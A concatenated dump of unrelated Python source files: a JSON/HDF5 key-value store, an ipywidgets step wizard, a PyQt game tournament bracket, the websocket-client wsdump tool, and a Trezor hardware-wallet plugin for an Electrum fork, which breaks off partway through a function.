result = self.store.get(key, None)
if result is None:
return default
try:
return json.loads(
result.value,
object_pairs_hook=AttrDict,
cls=CustomJSONDecoder)
except ValueError:
app_log.error('HDF5Store("%s").load("%s") is not JSON ("%r..."")',
self.path, key, result.value)
return default
def dump(self, key, value):
key = self._escape(key)
if self.store.get(key) != value:
if key in self.store:
del self.store[key]
self.store[key] = json.dumps(
value,
ensure_ascii=True,
separators=(',', ':'),
cls=CustomJSONEncoder)
self.changed = True
def _escape(self, key):
'''
Converts key into a unicode string (interpreting byte-string keys as UTF-8).
HDF5 does not accept / in key names. Replace those with tabs.
'''
if isinstance(key, six.binary_type):
key = six.text_type(key, encoding='utf-8')
else:
key = six.text_type(key)
return key.replace('/', '\t')
def keys(self):
# Keys cannot contain / in HDF5 store. Unescape it
return (key.replace('\t', '/') for key in self.store.keys())
def flush(self):
super(HDF5Store, self).flush()
if self.changed:
app_log.debug('Flushing %s', self.path)
self.store.flush()
self.changed = False
def purge(self):
'''
Load all keys into self.store. Delete what's required. Save.
'''
self.flush()
changed = False
items = {
key: json.loads(
val.value, object_pairs_hook=AttrDict, cls=CustomJSONDecoder)
for key, val in self.store.items()
}
for key in self.purge_keys(items):
del self.store[key]
changed = True
if changed:
app_log.debug('Purging %s', self.path)
self.store.flush()
def close(self):
try:
self.store.close()
# h5py.h5f.get_obj_ids often raises a ValueError: Not a file id.
# This is presumably if the file handle has been closed. Log & ignore.
except ValueError:
app_log.debug('HDF5Store("%s").close() error ignored', self.path)
class JSONStore(KeyStore):
'''
A KeyStore that stores data in a JSON file. Typical usage::
>>> store = JSONStore('file.json', flush=15)
>>> value = store.load(key)
>>> store.dump(key, value)
This is less efficient than HDF5Store for large data, but is human-readable.
They also cannot support multiple instances. Only one JSONStore instance
is permitted per file.
'''
def __init__(self, path, *args, **kwargs):
super(JSONStore, self).__init__(*args, **kwargs)
self.path = _create_path(path)
self.store = self._read_json()
self.changed = False
self.update = {} # key-values added since flush
def _read_json(self):
try:
with io.open(self.path) as handle: # noqa: no encoding for json
return json.load(handle, cls=CustomJSONDecoder)
except (IOError, ValueError):
return {}
def _write_json(self, data):
json_value = json.dumps(
data,
ensure_ascii=True,
separators=(',', ':'),
cls=CustomJSONEncoder)
with io.open(self.path, 'w') as handle: # noqa: no encoding for json
handle.write(json_value)
def dump(self, key, value):
'''Same as store[key] = value'''
key = self._escape(key)
if self.store.get(key) != value:
self.store[key] = value
self.update[key] = value
self.changed = True
def flush(self):
super(JSONStore, self).flush()
if self.changed:
app_log.debug('Flushing %s', self.path)
store = self._read_json()
store.update(self.update)
self._write_json(store)
self.store = store
self.update = {}
self.changed = False
def purge(self):
'''
Load all keys into self.store. Delete what's required. Save.
'''
self.flush()
changed = False
for key in self.purge_keys(self.store):
del self.store[key]
changed = True
if changed:
app_log.debug('Purging %s', self.path)
self._write_json(self.store)
def close(self):
try:
self.flush()
# This has happened when the directory was deleted. Log & ignore.
except OSError:
app_log.error('Cannot flush %s', self.path)
def _create_path(path):
# Ensure that path directory exists
path = os.path.abspath(path)
folder = os.path.dirname(path)
if not os.path.exists(folder):
os.makedirs(folder)
return path
def sizeof(obj):
if isinstance(obj, dict):
return sys.getsizeof(obj) + sum(sizeof(k) + sizeof(v) for k, v in obj.items())
elif isinstance(obj, (set, list)):
return sys.getsizeof(obj) + sum(sizeof(v) for v in obj)
return sys.getsizeof(obj)
|
wizard.py
|
"""The wizard application allows the implication of a Wizard-like GUI.
Authors:
* Carl Simon Adorf <simon.adorf@epfl.ch>
"""
from enum import Enum
from time import sleep
from time import time
from threading import Thread
import traitlets
import ipywidgets as ipw
class WizardAppWidgetStep(traitlets.HasTraits):
"One step of a WizardAppWidget."
class State(Enum):
"""Each step is always in one specific state.
The state is used to determine:
1) how the step is visually presented to the user, and
2) whether the next step is accessible (i.e. reached the SUCCESS state).
App developers are encouraged to use the step states to couple application
logic and interface. In general, all widget changes should trigger
a re-evaluation of the step state, and states also determine whether certain
widgets are enabled or disabled.
A step can be in one of the following states:
INIT: The initial state, usually all widgets disabled.
READY: The step (widget) is ready for user input (some or all widgets enabled).
CONFIGURED: The step is in a consistent configuration awaiting confirmation.
ACTIVE: The step is carrying out a runtime operation.
SUCCESS: A configuration has been confirmed / a runtime operation successfully finished.
FAIL: A runtime operation has failed in an unrecoverable way.
Not all steps must implement all states, for example:
- the first step does not need an INIT state
- a step without runtime process should not have an ACTIVE or FAIL state
- a "review & confirm" step does not require a READY state.
- a step without configuration options (e.g. pure "review & confirm" step)
Important: The next step is only accessible if the current step is within the SUCCESS
state!
"""
INIT = 0 # the step is initialized and all widgets are typically disabled
# The step is correctly configured and can in principle be confirmed.
CONFIGURED = 1 # configuration is valid
READY = 2 # step is ready for user input
ACTIVE = 3 # step is carrying out a runtime operation
SUCCESS = 4 # step has successfully completed
# All error states have negative codes
FAIL = -1 # the step has unrecoverably failed
state = traitlets.UseEnum(State)
auto_advance = traitlets.Bool()
def can_reset(self):
return hasattr(self, "reset")
class WizardAppWidget(ipw.VBox):
ICON_SEPARATOR = "\u2000" # en-dash (placed between title and icon)
ICONS = {
WizardAppWidgetStep.State.INIT: "\u25cb",
WizardAppWidgetStep.State.READY: "\u25ce",
WizardAppWidgetStep.State.CONFIGURED: "\u25cf",
WizardAppWidgetStep.State.ACTIVE: ["\u25dc", "\u25dd", "\u25de", "\u25df"],
WizardAppWidgetStep.State.SUCCESS: "\u2713",
WizardAppWidgetStep.State.FAIL: "\u00d7",
}
@classmethod
def icons(cls):
"""Return the icon set and return animated icons based on the current time stamp."""
t = time()
return {
key: item
if isinstance(item, str)
else item[int((t * len(item) % len(item)))]
for key, item in cls.ICONS.items()
}
selected_index = traitlets.Int(allow_none=True)
def __init__(self, steps, **kwargs):
# The number of steps must be greater than one
# for this app's logic to make sense.
if len(steps) < 2:
raise ValueError(
"The number of steps of a WizardAppWidget must be at least two."
)
self.steps = steps
# Unzip the steps to titles and widgets.
self.titles, widgets = zip(*steps)
# Initialize the accordion with the widgets ...
self.accordion = ipw.Accordion(children=widgets)
self._update_titles()
ipw.link((self.accordion, "selected_index"), (self, "selected_index"))
# Automatically update titles to implement the "spinner"
def spinner_thread():
while True:
sleep(0.1)
self._update_titles()
Thread(target=spinner_thread).start()
# Watch for changes to each step's state
for widget in widgets:
if not widget.has_trait("state"):
raise TypeError(
f"The provided '{widget}' as wizard app step has no `state` trait. "
"It is expected that step classes are derived from the WizardAppWidgetStep class."
)
widget.observe(self._update_step_state, names=["state"])
self.reset_button = ipw.Button(
description="Reset",
icon="undo",
layout=ipw.Layout(width="auto", flex="1 1 auto"),
tooltip="Reset the app to start over (if possible)",
disabled=True,
)
self.reset_button.on_click(self._on_click_reset_button)
# Create a back-button, to switch to the previous step when possible:
self.back_button = ipw.Button(
description="Previous step",
icon="step-backward",
layout=ipw.Layout(width="auto", flex="1 1 auto"),
tooltip="Go to the previous step.",
disabled=True,
)
self.back_button.on_click(self._on_click_back_button)
# Create a next-button, to switch to the next step when appropriate:
self.next_button = ipw.Button(
description="Next step",
icon="step-forward",
layout=ipw.Layout(width="auto", flex="1 1 auto"),
tooltip="Go to the next step.",
disabled=True,
)
self.next_button.on_click(self._on_click_next_button)
header = ipw.HBox(
children=[self.back_button, self.reset_button, self.next_button]
)
super().__init__(children=[header, self.accordion], **kwargs)
def _update_titles(self):
for i, (title, widget) in enumerate(zip(self.titles, self.accordion.children)):
icon = self.icons().get(widget.state, str(widget.state).upper())
self.accordion.set_title(i, f"{icon} Step {i+1}: {title}")
def _consider_auto_advance(self, _=None):
"""Determine whether the app should automatically advance to the next step.
This is performed whenever the current step is within the SUCCESS state and has
the auto_advance attribute set to True.
"""
with self.hold_trait_notifications():
index = self.accordion.selected_index
last_step_selected = index + 1 == len(self.accordion.children)
selected_widget = self.accordion.children[index]
if (
selected_widget.auto_advance
and not last_step_selected
and selected_widget.state == WizardAppWidgetStep.State.SUCCESS
):
self.accordion.selected_index += 1
def _update_step_state(self, _):
with self.hold_trait_notifications():
self._update_titles()
self._update_buttons()
self._consider_auto_advance()
@traitlets.observe("selected_index")
def _observe_selected_index(self, change):
"Activate/deactivate the next-button based on which step is selected."
self._update_buttons()
def can_reset(self):
steps = [
self.accordion.children[idx] for idx in range(len(self.accordion.children))
]
if any(not step.can_reset() for step in steps):
return False
if any(step.state is not WizardAppWidgetStep.State.INIT for step in steps):
return True
def _update_buttons(self):
with self.hold_trait_notifications():
index = self.accordion.selected_index
if index is None:
self.back_button.disabled = True
self.next_button.disabled = True
self.reset_button.disabled = True
else:
first_step_selected = index == 0
last_step_selected = index + 1 == len(self.accordion.children)
selected_widget = self.accordion.children[index]
self.back_button.disabled = (
first_step_selected
or selected_widget.state
in (
WizardAppWidgetStep.State.ACTIVE,
WizardAppWidgetStep.State.SUCCESS,
WizardAppWidgetStep.State.FAIL,
)
)
self.next_button.disabled = (
last_step_selected
or selected_widget.state is not WizardAppWidgetStep.State.SUCCESS
)
self.reset_button.disabled = not self.can_reset()
def reset(self, step=0):
"""Reset the app up to the given step.
For example, with step=0 (the default), the whole app is reset.
With step=1, all but the first step are reset.
"""
with self.hold_sync():
for index in reversed(range(step, len(self.accordion.children))):
if hasattr(self.accordion.children[index], "reset"):
self.accordion.children[index].reset()
self.accordion.selected_index = step
def _on_click_reset_button(self, _):
self.reset()
def _on_click_back_button(self, _):
self.accordion.selected_index -= 1
def _on_click_next_button(self, _):
self.accordion.selected_index += 1
|
TournamentGame.py
|
import random
import sys
from PyQt5.QtWidgets import QApplication
from client.Game import Game
from multiprocessing import Queue, Process
from client.TournamentWinner import DisplayWinner
def _start_tournament_(player1_id: str, player1_spacecraft: str,
player2_id: str, player2_spacecraft: str,
player3_id: str, player3_spacecraft: str,
player4_id: str, player4_spacecraft: str,
player5_id: str = "", player5_spacecraft: str = "",
player6_id: str = "", player6_spacecraft: str = "",
player7_id: str = "", player7_spacecraft: str = "",
player8_id: str = "", player8_spacecraft: str = ""):
player_ids = [player1_id, player2_id, player3_id, player4_id]
player_spacecrafts = [player1_spacecraft, player2_spacecraft, player3_spacecraft, player4_spacecraft]
if not player5_id == "":
player_ids.append(player5_id)
player_ids.append(player6_id)
player_ids.append(player7_id)
player_ids.append(player8_id)
player_spacecrafts.append(player5_spacecraft)
player_spacecrafts.append(player6_spacecraft)
player_spacecrafts.append(player7_spacecraft)
player_spacecrafts.append(player8_spacecraft)
rand_idx = random.sample(range(0, len(player_ids)), len(player_ids))
queue = Queue()
if len(player_ids) == 4:
winner1_id = _game_process(queue, player_ids[rand_idx[0]], player_spacecrafts[rand_idx[0]],
player_ids[rand_idx[1]], player_spacecrafts[rand_idx[1]])
winner1_spacecraft = player_spacecrafts[player_ids.index(winner1_id)]
print(f'WINNER ROUND 1: {winner1_id}')
winner2_id = _game_process(queue, player_ids[rand_idx[2]], player_spacecrafts[rand_idx[2]],
player_ids[rand_idx[3]], player_spacecrafts[rand_idx[3]])
winner2_spacecraft = player_spacecrafts[player_ids.index(winner2_id)]
print(f'WINNER ROUND 2: {winner2_id}')
finals_winner_id = _game_process(queue, winner1_id, winner1_spacecraft,
winner2_id, winner2_spacecraft)
finals_winner_spacecraft = player_spacecrafts[player_ids.index(finals_winner_id)]
print(f'TOURNAMENT WINNER: {finals_winner_id}')
_display_winner_process(finals_winner_id, finals_winner_spacecraft)
elif len(player_ids) == 8:
winner1_id = _game_process(queue, player_ids[rand_idx[0]], player_spacecrafts[rand_idx[0]],
player_ids[rand_idx[1]], player_spacecrafts[rand_idx[1]])
winner1_spacecraft = player_spacecrafts[player_ids.index(winner1_id)]
print(f'WINNER GAME 1 [QUARTERFINALS]: {winner1_id}')
winner2_id = _game_process(queue, player_ids[rand_idx[2]], player_spacecrafts[rand_idx[2]],
player_ids[rand_idx[3]], player_spacecrafts[rand_idx[3]])
winner2_spacecraft = player_spacecrafts[player_ids.index(winner2_id)]
print(f'WINNER GAME 2 [QUARTERFINALS]: {winner2_id}')
winner3_id = _game_process(queue, player_ids[rand_idx[4]], player_spacecrafts[rand_idx[4]],
player_ids[rand_idx[5]], player_spacecrafts[rand_idx[5]])
winner3_spacecraft = player_spacecrafts[player_ids.index(winner3_id)]
print(f'WINNER GAME 3 [QUARTERFINALS]: {winner3_id}')
winner4_id = _game_process(queue, player_ids[rand_idx[6]], player_spacecrafts[rand_idx[6]],
player_ids[rand_idx[7]], player_spacecrafts[rand_idx[7]])
winner4_spacecraft = player_spacecrafts[player_ids.index(winner4_id)]
print(f'WINNER GAME 4 [QUARTERFINALS]: {winner4_id}')
semifinals_winner1_id = _game_process(queue, winner1_id, winner1_spacecraft,
winner2_id, winner2_spacecraft)
semifinals_winner1_spacecraft = player_spacecrafts[player_ids.index(semifinals_winner1_id)]
print(f'WINNER GAME 1 [SEMIFINALS]: {semifinals_winner1_id}')
semifinals_winner2_id = _game_process(queue, winner3_id, winner3_spacecraft,
winner4_id, winner4_spacecraft)
semifinals_winner2_spacecraft = player_spacecrafts[player_ids.index(semifinals_winner2_id)]
print(f'WINNER GAME 2 [SEMIFINALS]: {semifinals_winner2_id}')
# THE GRAND FINALE
finals_winner_id = _game_process(queue, semifinals_winner1_id, semifinals_winner1_spacecraft,
semifinals_winner2_id, semifinals_winner2_spacecraft)
finals_winner_spacecraft = player_spacecrafts[player_ids.index(finals_winner_id)]
print(f'TOURNAMENT WINNER: {finals_winner_id}')
_display_winner_process(finals_winner_id, finals_winner_spacecraft)
def _game_process(queue, player1_id, player1_spacecraft,
player2_id, player2_spacecraft) -> str:
process = Process(target=_start_game_, args=(queue, player1_id, player1_spacecraft,
player2_id, player2_spacecraft))
process.start()
winner_id = queue.get()
process.terminate()
return winner_id
def _start_game_(queue: Queue, player1_id, player1_spacecraft,
player2_id, player2_spacecraft):
app = QApplication(sys.argv)
game = TournamentGame(queue=queue, player1_id=player1_id, player1_spacecraft=player1_spacecraft,
player2_id=player2_id, player2_spacecraft=player2_spacecraft)
game.show()
sys.exit(app.exec_())
def _display_winner_process(winner: str, spacecraft: str):
process = Process(target=_display_winner, args=(winner, spacecraft))
process.start()
def _display_winner(winner: str, spacecraft: str):
app = QApplication(sys.argv)
dspl_wn = DisplayWinner(winner=winner, spacecraft=spacecraft)
dspl_wn.show()
sys.exit(app.exec_())
class TournamentGame(Game):
def __init__(self, queue: Queue, player1_id: str, player1_spacecraft: str,
player2_id: str, player2_spacecraft: str):
super().__init__(player_id=player1_id, player_spacecraft=player1_spacecraft,
player2_id=player2_id, player2_spacecraft=player2_spacecraft)
self.queue = queue
self.tournament_mode = True
def game_over(self):
super().game_over()
self.queue.put(self.winner.username)
self.queue.close()
# self.display_winner = DisplayWinner(self.winner.username)
# self.display_winner.show()
|
wsdump.py
|
#!/usr/share/nginx/html/appbot2/bin/python
import argparse
import code
import sys
import threading
import time
import ssl
import six
from six.moves.urllib.parse import urlparse
import websocket
try:
import readline
except ImportError:
pass
def get_encoding():
encoding = getattr(sys.stdin, "encoding", "")
if not encoding:
return "utf-8"
else:
return encoding.lower()
OPCODE_DATA = (websocket.ABNF.OPCODE_TEXT, websocket.ABNF.OPCODE_BINARY)
ENCODING = get_encoding()
class VAction(argparse.Action):
def __call__(self, parser, args, values, option_string=None):
if values is None:
values = "1"
try:
values = int(values)
except ValueError:
values = values.count("v") + 1
setattr(args, self.dest, values)
def parse_args():
parser = argparse.ArgumentParser(description="WebSocket Simple Dump Tool")
parser.add_argument("url", metavar="ws_url",
help="websocket url. ex. ws://echo.websocket.org/")
parser.add_argument("-p", "--proxy",
help="proxy url. ex. http://127.0.0.1:8080")
parser.add_argument("-v", "--verbose", default=0, nargs='?', action=VAction,
dest="verbose",
help="set verbose mode. If set to 1, show opcode. "
"If set to 2, enable to trace websocket module")
parser.add_argument("-n", "--nocert", action='store_true',
help="Ignore invalid SSL cert")
parser.add_argument("-r", "--raw", action="store_true",
help="raw output")
parser.add_argument("-s", "--subprotocols", nargs='*',
help="Set subprotocols")
parser.add_argument("-o", "--origin",
help="Set origin")
parser.add_argument("--eof-wait", default=0, type=int,
help="wait time(second) after 'EOF' received.")
parser.add_argument("-t", "--text",
help="Send initial text")
parser.add_argument("--timings", action="store_true",
help="Print timings in seconds")
parser.add_argument("--headers",
help="Set custom headers. Use ',' as separator")
return parser.parse_args()
class RawInput:
def raw_input(self, prompt):
if six.PY3:
line = input(prompt)
else:
line = raw_input(prompt)
if ENCODING and ENCODING != "utf-8" and not isinstance(line, six.text_type):
line = line.decode(ENCODING).encode("utf-8")
elif isinstance(line, six.text_type):
line = line.encode("utf-8")
return line
class InteractiveConsole(RawInput, code.InteractiveConsole):
def write(self, data):
sys.stdout.write("\033[2K\033[E")
# sys.stdout.write("\n")
sys.stdout.write("\033[34m< " + data + "\033[39m")
sys.stdout.write("\n> ")
sys.stdout.flush()
def read(self):
return self.raw_input("> ")
class NonInteractive(RawInput):
def write(self, data):
sys.stdout.write(data)
sys.stdout.write("\n")
sys.stdout.flush()
def read(self):
return self.raw_input("")
def main():
start_time = time.time()
args = parse_args()
if args.verbose > 1:
websocket.enableTrace(True)
options = {}
if args.proxy:
p = urlparse(args.proxy)
options["http_proxy_host"] = p.hostname
options["http_proxy_port"] = p.port
if args.origin:
options["origin"] = args.origin
if args.subprotocols:
options["subprotocols"] = args.subprotocols
opts = {}
if args.nocert:
opts = {"cert_reqs": ssl.CERT_NONE, "check_hostname": False}
if args.headers:
options['header'] = map(str.strip, args.headers.split(','))
ws = websocket.create_connection(args.url, sslopt=opts, **options)
if args.raw:
console = NonInteractive()
else:
console = InteractiveConsole()
print("Press Ctrl+C to quit")
def recv():
try:
frame = ws.recv_frame()
except websocket.WebSocketException:
return websocket.ABNF.OPCODE_CLOSE, None
if not frame:
raise websocket.WebSocketException("Not a valid frame %s" % frame)
elif frame.opcode in OPCODE_DATA:
return frame.opcode, frame.data
elif frame.opcode == websocket.ABNF.OPCODE_CLOSE:
ws.send_close()
return frame.opcode, None
elif frame.opcode == websocket.ABNF.OPCODE_PING:
ws.pong(frame.data)
return frame.opcode, frame.data
return frame.opcode, frame.data
def recv_ws():
while True:
opcode, data = recv()
msg = None
if six.PY3 and opcode == websocket.ABNF.OPCODE_TEXT and isinstance(data, bytes):
data = str(data, "utf-8")
if not args.verbose and opcode in OPCODE_DATA:
msg = data
elif args.verbose:
msg = "%s: %s" % (websocket.ABNF.OPCODE_MAP.get(opcode), data)
if msg is not None:
if args.timings:
console.write(str(time.time() - start_time) + ": " + msg)
else:
console.write(msg)
if opcode == websocket.ABNF.OPCODE_CLOSE:
break
thread = threading.Thread(target=recv_ws)
thread.daemon = True
thread.start()
if args.text:
ws.send(args.text)
while True:
try:
message = console.read()
ws.send(message)
except KeyboardInterrupt:
return
except EOFError:
time.sleep(args.eof_wait)
return
if __name__ == "__main__":
try:
main()
except Exception as e:
print(e)
|
trezor.py
|
from binascii import hexlify, unhexlify
import traceback
import sys
from btn_electrum.util import bfh, bh2u, versiontuple, UserCancelled
from btn_electrum.btn import (b58_address_to_hash160, xpub_from_pubkey,
TYPE_ADDRESS, TYPE_SCRIPT, btn_addr_to_bitcoin_addr)
from btn_electrum import constants
from btn_electrum.i18n import _
from btn_electrum.plugins import BasePlugin, Device
from btn_electrum.transaction import deserialize, Transaction
from btn_electrum.keystore import Hardware_KeyStore, is_xpubkey, parse_xpubkey, xtype_from_derivation
from btn_electrum.base_wizard import ScriptTypeNotSupported
from ..hw_wallet import HW_PluginBase
# TREZOR initialization methods
TIM_NEW, TIM_RECOVER, TIM_MNEMONIC, TIM_PRIVKEY = range(0, 4)
RECOVERY_TYPE_SCRAMBLED_WORDS, RECOVERY_TYPE_MATRIX = range(0, 2)
# script "generation"
SCRIPT_GEN_LEGACY, SCRIPT_GEN_P2SH_SEGWIT, SCRIPT_GEN_NATIVE_SEGWIT = range(0, 3)
class TrezorKeyStore(Hardware_KeyStore):
hw_type = 'trezor'
device = 'TREZOR'
def get_derivation(self):
return self.derivation
def get_script_gen(self):
xtype = xtype_from_derivation(self.derivation)
if xtype in ('p2wpkh', 'p2wsh'):
return SCRIPT_GEN_NATIVE_SEGWIT
elif xtype in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return SCRIPT_GEN_P2SH_SEGWIT
else:
return SCRIPT_GEN_LEGACY
def get_client(self, force_pair=True):
return self.plugin.get_client(self, force_pair)
def decrypt_message(self, sequence, message, password):
raise RuntimeError(_('Encryption and decryption are not implemented by {}').format(self.device))
def sign_message(self, sequence, message, password):
client = self.get_client()
address_path = self.get_derivation() + "/%d/%d" % sequence
address_n = client.expand_path(address_path)
msg_sig = client.sign_message(self.plugin.get_coin_name(), address_n, message)
return msg_sig.signature
def sign_transaction(self, tx, password):
if tx.is_complete():
return
# previous transactions used as inputs
prev_tx = {}
# path of the xpubs that are involved
xpub_path = {}
for txin in tx.inputs():
pubkeys, x_pubkeys = tx.get_sorted_pubkeys(txin)
tx_hash = txin['prevout_hash']
if txin.get('prev_tx') is None and not Transaction.is_segwit_input(txin):
raise Exception(_('Offline signing with {} is not supported for legacy inputs.').format(self.device))
prev_tx[tx_hash] = txin['prev_tx']
for x_pubkey in x_pubkeys:
if not is_xpubkey(x_pubkey):
continue
xpub, s = parse_xpubkey(x_pubkey)
if xpub == self.get_master_public_key():
xpub_path[xpub] = self.get_derivation()
self.plugin.sign_transaction(self, tx, prev_tx, xpub_path)
class TrezorPlugin(HW_PluginBase):
# Derived classes provide:
#
# class-static variables: client_class, firmware_URL, handler_class,
# libraries_available, libraries_URL, minimum_firmware,
# wallet_class, ckd_public, types
firmware_URL = 'https://wallet.trezor.io'
libraries_URL = 'https://github.com/trezor/python-trezor'
minimum_firmware = (1, 5, 2)
keystore_class = TrezorKeyStore
minimum_library = (0, 9, 0)
SUPPORTED_XTYPES = ('standard', 'p2wpkh-p2sh', 'p2wpkh', 'p2wsh-p2sh', 'p2wsh')
MAX_LABEL_LEN = 32
def __init__(self, parent, config, name):
HW_PluginBase.__init__(self, parent, config, name)
try:
# Minimal test if python-trezor is installed
import trezorlib
try:
library_version = trezorlib.__version__
except AttributeError:
# python-trezor only introduced __version__ in 0.9.0
library_version = 'unknown'
if library_version == 'unknown' or \
versiontuple(library_version) < self.minimum_library:
self.libraries_available_message = (
_("Library version for '{}' is too old.").format(name)
+ '\nInstalled: {}, Needed: {}'
.format(library_version, self.minimum_library))
self.print_stderr(self.libraries_available_message)
raise ImportError()
self.libraries_available = True
except ImportError:
self.libraries_available = False
return
from . import client
from . import transport
import trezorlib.ckd_public
import trezorlib.messages
self.client_class = client.TrezorClient
self.ckd_public = trezorlib.ckd_public
self.types = trezorlib.messages
self.DEVICE_IDS = ('TREZOR',)
self.transport_handler = transport.TrezorTransport()
self.device_manager().register_enumerate_func(self.enumerate)
def enumerate(self):
devices = self.transport_handler.enumerate_devices()
return [Device(d.get_path(), -1, d.get_path(), 'TREZOR', 0) for d in devices]
def create_client(self, device, handler):
try:
self.print_error("connecting to device at", device.path)
transport = self.transport_handler.get_transport(device.path)
except BaseException as e:
self.print_error("cannot connect at", device.path, str(e))
return None
if not transport:
self.print_error("cannot connect at", device.path)
return
self.print_error("connected to device at", device.path)
client = self.client_class(transport, handler, self)
# Try a ping for device sanity
try:
client.ping('t')
except BaseException as e:
self.print_error("ping failed", str(e))
return None
if not client.atleast_version(*self.minimum_firmware):
msg = (_('Outdated {} firmware for device labelled {}. Please '
'download the updated firmware from {}')
.format(self.device, client.label(), self.firmware_URL))
self.print_error(msg)
handler.show_error(msg)
return None
return client
def get_client(self, keystore, force_pair=True):
devmgr = self.device_manager()
handler = keystore.handler
with devmgr.hid_lock:
client = devmgr.client_for_keystore(self, handler, keystore, force_pair)
# returns the client for a given keystore. can use xpub
if client:
client.used()
return client
def get_coin_name(self):
return "Testnet" if constants.net.TESTNET else "Btn"
def initialize_device(self, device_id, wizard, handler):
# Initialization method
msg = _("Choose how you want to initialize your {}.\n\n"
"The first two methods are secure as no secret information "
"is entered into your computer.\n\n"
"For the last two methods you input secrets on your keyboard "
"and upload them to your {}, and so you should "
"only do those on a computer you know to be trustworthy "
"and free of malware."
).format(self.device, self.device)
choices = [
# Must be short as QT doesn't word-wrap radio button text
(TIM_NEW, _("Let the device generate a completely new seed randomly")),
(TIM_RECOVER, _("Recover from a seed you have previously written down")),
(TIM_MNEMONIC, _("Upload a BIP39 mnemonic to generate the seed")),
(TIM_PRIVKEY, _("Upload a master private key"))
]
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
model = client.get_trezor_model()
def f(method):
import threading
settings = self.request_trezor_init_settings(wizard, method, model)
t = threading.Thread(target=self._initialize_device_safe, args=(settings, method, device_id, wizard, handler))
t.setDaemon(True)
t.start()
exit_code = wizard.loop.exec_()
if exit_code != 0:
# this method (initialize_device) was called with the expectation
# of leaving the device in an initialized state when finishing.
# signal that this is not the case:
raise UserCancelled()
wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f)
def _initialize_device_safe(self, settings, method, device_id, wizard, handler):
exit_code = 0
try:
self._initialize_device(settings, method, device_id, wizard, handler)
except UserCancelled:
exit_code = 1
except BaseException as e:
traceback.print_exc(file=sys.stderr)
handler.show_error(str(e))
exit_code = 1
finally:
wizard.loop.exit(exit_code)
def _initialize_device(self, settings, method, device_id, wizard, handler):
item, label, pin_protection, passphrase_protection, recovery_type = settings
if method == TIM_RECOVER and recovery_type == RECOVERY_TYPE_SCRAMBLED_WORDS:
handler.show_error(_(
"You will be asked to enter 24 words regardless of your "
"seed's actual length. If you enter a word incorrectly or "
"misspell it, you cannot change it or go back - you will need "
"to start again from the beginning.\n\nSo please enter "
"the words carefully!"), blocking=True)
language = 'english'
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
if method == TIM_NEW:
strength = 64 * (item + 2) # 128, 192 or 256
u2f_counter = 0
skip_backup = False
client.reset_device(True, strength, passphrase_protection,
pin_protection, label, language,
u2f_counter, skip_backup)
elif method == TIM_RECOVER:
word_count = 6 * (item + 2) # 12, 18 or 24
client.step = 0
if recovery_type == RECOVERY_TYPE_SCRAMBLED_WORDS:
recovery_type_trezor = self.types.RecoveryDeviceType.ScrambledWords
else:
recovery_type_trezor = self.types.RecoveryDeviceType.Matrix
client.recovery_device(word_count, passphrase_protection,
pin_protection, label, language, type=recovery_type_trezor)
if recovery_type == RECOVERY_TYPE_MATRIX:
handler.close_matrix_dialog()
elif method == TIM_MNEMONIC:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_mnemonic(str(item), pin,
passphrase_protection,
label, language)
else:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_xprv(item, pin, passphrase_protection,
label, language)
def setup_device(self, device_info, wizard, purpose):
devmgr = self.device_manager()
device_id = device_info.device.id_
client = devmgr.client_by_id(device_id)
if client is None:
raise Exception(_('Failed to create a client for this device.') + '\n' +
_('Make sure it is in the correct state.'))
# fixme: we should use: client.handler = wizard
client.handler = self.create_handler(wizard)
if not device_info.initialized:
self.initialize_device(device_id, wizard, client.handler)
client.get_xpub('m', 'standard')
client.used()
def get_xpub(self, device_id, derivation, xtype, wizard):
if xtype not in self.SUPPORTED_XTYPES:
raise ScriptTypeNotSupported(_('This type of script is not supported with {}.').format(self.device))
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
client.handler = wizard
xpub = client.get_xpub(derivation, xtype)
client.used()
return xpub
def get_trezor_input_script_type(self, script_gen, is_multisig):
if script_gen == SCRIPT_GEN_NATIVE_SEGWIT:
return self.types.InputScriptType.SPENDWITNESS
elif script_gen == SCRIPT_GEN_P2SH_SEGWIT:
return self.types.InputScriptType.SPENDP2SHWITNESS
else:
if is_multisig:
return self.types.InputScriptType.SPENDMULTISIG
else:
return self.types.InputScriptType.SPENDADDRESS
def sign_transaction(self, keystore, tx, prev_tx, xpub_path):
self.prev_tx = prev_tx
self.xpub_path = xpub_path
client = self.get_client(keystore)
inputs = self.tx_inputs(tx, True, keystore.get_script_gen())
outputs = self.tx_outputs(keystore.get_derivation(), tx, keystore.get_script_gen())
signed_tx = client.sign_tx(self.get_coin_name(), inputs, outputs, lock_time=tx.locktime)[1]
raw = bh2u(signed_tx)
tx.update_signatures(raw)
def show_address(self, wallet, address, keystore=None):
if keystore is None:
keystore = wallet.get_keystore()
if not self.show_address_helper(wallet, address, keystore):
return
client = self.get_client(keystore)
if not client.atleast_version(1, 3):
keystore.handler.show_error(_("Your device firmware is too old"))
return
change, index = wallet.get_address_index(address)
derivation = keystore.derivation
address_path = "%s/%d/%d" % (derivation, change, index)
address_n = client.expand_path(address_path)
xpubs = wallet.get_master_public_keys()
if len(xpubs) == 1:
script_gen = keystore.get_script_gen()
script_type = self.get_trezor_input_script_type(script_gen, is_multisig=False)
client.get_address(self.get_coin_name(), address_n, True, script_type=script_type)
else:
def f(xpub):
node = self.ckd_public.deserialize(xpub)
return self.types.HDNodePathType(node=node, address_n=[change, index])
pubkeys = wallet.get_public_keys(address)
# sort xpubs using the order of pubkeys
sorted_pubkeys, sorted_xpubs = zip(*sorted(zip(pubkeys, xpubs)))
pubkeys = list(map(f, sorted_xpubs))
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * wallet.n,
m=wallet.m,
)
script_gen = keystore.get_script_gen()
script_type = self.get_trezor_input_script_type(script_gen, is_multisig=True)
client.get_address(self.get_coin_name(), address_n, True, multisig=multisig, script_type=script_type)
def tx_inputs(self, tx, for_sig=False, script_gen=SCRIPT_GEN_LEGACY):
inputs = []
for txin in tx.inputs():
txinputtype = self.types.TxInputType()
if txin['type'] == 'coinbase':
prev_hash = "\0" * 32
prev_index = 0xffffffff # signed int -1
else:
if for_sig:
x_pubkeys = txin['x_pubkeys']
if len(x_pubkeys) == 1:
